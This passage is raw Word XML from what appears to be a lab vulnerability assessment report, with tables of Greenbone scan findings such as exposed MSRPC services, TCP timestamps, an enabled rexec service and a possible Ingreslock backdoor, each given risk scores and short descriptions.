            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00170D8E">
              <w:t>DCERPC and MSRPC Services Enumeration Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57F2EE13" w14:textId="42704DC2" w:rsidR="00075FB2" w:rsidRDefault="00B0491B" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DA42CF1" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
          </w:tcPr>
          <w:p w14:paraId="0FA59A75" w14:textId="018B31B6" w:rsidR="00075FB2" w:rsidRDefault="00A51FCE" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A51FCE">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Exposed DCERPC/MSRPC services allow enumeration of service details and potential exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00075FB2" w14:paraId="30E9B724" w14:textId="40A9DEB2" w:rsidTr="00831F32">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1435C413" w14:textId="0823C066" w:rsidR="00075FB2" w:rsidRDefault="00E7658A" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6DAFD31C" w14:textId="01A80450" w:rsidR="00075FB2" w:rsidRDefault="00860A3C" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00860A3C">
              <w:t>TCP Timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0D42BA95" w14:textId="7B5A8B74" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B0491B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="53FC9EB3" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
          </w:tcPr>
          <w:p w14:paraId="4FD12948" w14:textId="09378E8D" w:rsidR="00075FB2" w:rsidRDefault="00A51FCE" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A51FCE">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>System responds with TCP timestamps, which may assist attackers in fingerprinting system uptime and conducting timing attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F14C3B8" w14:textId="77777777" w:rsidR="00E617E5" w:rsidRDefault="00E617E5" w:rsidP="00444C92">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492F5B4E" w14:textId="224F6F0E" w:rsidR="00974939" w:rsidRDefault="00F433EB" w:rsidP="00195304">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C642ECF" wp14:editId="2C64F5B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>461176</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1620824</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1852654" cy="596348"/>
                <wp:effectExtent l="57150" t="19050" r="71755" b="89535"/>
                <wp:wrapNone/>
                <wp:docPr id="2000621064" name="Rectangle 10"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1852654" cy="596348"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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37B564" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:36.3pt;margin-top:127.6pt;width:145.9pt;height:46.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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00974939">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AD43ED" wp14:editId="5B664ADB">
            <wp:extent cx="5160397" cy="3521861"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="3933833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83332" name="Picture 8"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60397" cy="3521861"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A1FD8" w14:textId="75F727A3" w:rsidR="00974939" w:rsidRPr="004826D5" w:rsidRDefault="00974939" w:rsidP="009B4FAA">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008256C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00831F1B" w:rsidRPr="008256C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008256C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004826D5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004826D5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004826D5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results for Victim-Laptop (192.168.57.20) showing four detected vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00545C57" w:rsidRPr="004826D5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31806373" w14:textId="77777777" w:rsidR="009B4FAA" w:rsidRDefault="009B4FAA" w:rsidP="009B4FAA"/>
    <w:p w14:paraId="70251A17" w14:textId="7E8F8474" w:rsidR="00475B86" w:rsidRPr="00AE3438" w:rsidRDefault="00E617E5" w:rsidP="00AE3438">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Table 2 — Application Server Vulnerabilities (192.168.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F7571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>57.30) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F7571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 5 Critical/High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>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3200"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="3808"/>
      </w:tblGrid>
      <w:tr w:rsidR="0096348E" w14:paraId="6CCCFCF8" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10A4AC52" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1873828F" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00075FB2">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Vulnerability Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22646757" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Risk Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00DD41B6" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
          </w:tcPr>
          <w:p w14:paraId="432E9312" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0096348E" w14:paraId="6519848B" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F119CD3" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31B9FF54" w14:textId="67757170" w:rsidR="0096348E" w:rsidRDefault="007D2985" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="007D2985">
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>rexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D2985">
              <w:t xml:space="preserve"> service is running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47850797" w14:textId="755C2317" w:rsidR="0096348E" w:rsidRDefault="006C2B5F" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55811009" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="5350FD7D" w14:textId="77DF9BDC" w:rsidR="0096348E" w:rsidRDefault="00B830BC" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The legacy </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> service is enabled, exposing the server to remote execution risks without authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0096348E" w14:paraId="3BF36979" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EFEA410" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29E8ABF1" w14:textId="7DA73C5A" w:rsidR="0096348E" w:rsidRDefault="007D2985" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="007D2985">
              <w:t xml:space="preserve">Possible Backdoor: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>Ingreslock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E1903E2" w14:textId="2438CF9E" w:rsidR="0096348E" w:rsidRDefault="006C2B5F" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00B6CBF3" w14:textId="77777777" w:rsidR="0096348E" w:rsidRDefault="0096348E" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="7FBACA64" w14:textId="248889CF" w:rsidR="0096348E" w:rsidRDefault="00B830BC" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ingreslock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> backdoor detected, which could allow unauthorized remote access to the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
